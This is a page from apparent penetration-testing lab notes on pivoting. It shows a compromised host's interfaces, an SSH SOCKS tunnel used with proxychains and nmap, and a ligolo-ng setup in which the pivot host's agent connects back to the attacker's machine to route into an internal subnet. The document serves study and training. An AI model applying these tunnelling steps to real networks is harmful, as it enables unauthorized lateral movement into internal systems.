Pivoting

Ifconfig

root@dmz01:~# ifconfig
br-65c448355ed2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        inet6 fe80::42:d3ff:fea2:1f5a  prefixlen 64  scopeid 0x20<link>
        ether 02:42:d3:a2:1f:5a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11  bytes 1130 (1.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:f6ff:feaf:7e61  prefixlen 64  scopeid 0x20<link>
        ether 02:42:f6:af:7e:61  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5  bytes 526 (526.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.229.147  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 fe80::250:56ff:fe94:7a67  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:fe94:7a67  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:94:7a:67  txqueuelen 1000  (Ethernet)
        RX packets 10808  bytes 867624 (867.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2277  bytes 241553 (241.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.8.120  netmask 255.255.0.0  broadcast 172.16.255.255
        inet6 fe80::250:56ff:fe94:b265  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:94:b2:65  txqueuelen 1000  (Ethernet)
        RX packets 994  bytes 66628 (66.6 KB)
        RX errors 0  dropped 30  overruns 0  frame 0
        TX packets 40  bytes 3396 (3.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3344  bytes 262766 (262.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3344  bytes 262766 (262.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lets use this host as a pivot host to access the internal networks shown here.

ssh -D 8081 -i sshpk [email protected]

Modifying the /etc/proxychains.conf to add:

socks4 	127.0.0.1 8081

Now we can run nmap on the hosts second NIC ens192 (had to use -Pn)

proxychains nmap -sT -p 21,22,80,8080 172.16.8.120 -Pn

NVM, it didnt work for me very well.

Alternative - ligolo-ng

Download both agent and proxy files:

sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

Transfer the agent file to the pivot host:

scp -i id_rsa agent root@$IP:~/

On attacker side, run the proxy, before that add the tunnel interface:

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

sudo ./proxy -selfcert

On th pivot host run the agent:

./agent -connect 10.10.15.209:11601 -ignore-cert

After we are connected, run these commands on our attack host to verify interfaces of the pivot host:

sessions #list sessions and select one

Before starting the tunnel add this on another terminal on our attack host:

sudo ip route add 172.16.0.0/16 dev ligolo

Finally on the proxy terminal. type start and that's it.

PreviousPrivesc NextInternal Enumeration

Last updated 10 months ago